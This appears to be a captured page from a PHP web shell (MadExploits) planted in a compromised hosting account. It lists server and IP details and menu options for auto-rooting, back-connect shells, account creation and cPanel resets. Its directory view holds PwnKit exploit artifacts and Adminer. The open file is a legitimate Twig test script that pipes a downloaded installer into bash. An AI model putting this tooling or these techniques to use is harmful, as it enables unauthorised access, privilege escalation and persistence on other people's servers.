Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
vendor /
twig /
twig /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwx---r-x
ext
[ DIR ]
drwx---r-x
lib
[ DIR ]
drwx---r-x
src
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
CHANGELOG
48.69
KB
-rw----r--
LICENSE
1.46
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
drupal_test.sh
1.63
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : drupal_test.sh
#!/bin/bash set -x set -e REPO=`pwd` cd /tmp rm -rf drupal-twig-test composer create-project --no-interaction drupal-composer/drupal-project:8.x-dev drupal-twig-test cd drupal-twig-test (cd vendor/twig && rm -rf twig && ln -sf $REPO twig) echo '$config["system.logging"]["error_level"] = "verbose";' >> web/sites/default/settings.php php ./web/core/scripts/drupal install --no-interaction demo_umami > output perl -p -i -e 's/^([A-Za-z]+)\: (.+)$/export DRUPAL_\1=\2/' output source output wget https://get.symfony.com/cli/installer -O - | bash export PATH="$HOME/.symfony/bin:$PATH" symfony server:start -d --no-tls ENDPOINT=`symfony server:status -no-ansi | sed -E 's/^.+ http/http/'` curl -OLsS https://get.blackfire.io/blackfire-player.phar chmod +x blackfire-player.phar cat > drupal-tests.bkf <<EOF name "Drupal tests" scenario name "homepage" set name "admin" set pass "pass" visit url('/') expect status_code() == 200 click link('Articles') expect status_code() == 200 click link('Dairy-free and delicious milk chocolate') expect body() matches "/Dairy\-free milk chocolate is made in largely the same way as regular chocolate/" expect status_code() == 200 click link('Log in') expect status_code() == 200 submit button("Log in") param name name param pass pass expect status_code() == 303 follow expect status_code() == 200 click link('Structure') expect status_code() == 200 EOF ./blackfire-player.phar run drupal-tests.bkf --endpoint=$ENDPOINT --variable name=$DRUPAL_Username --variable pass=$DRUPAL_Password symfony server:stop
Close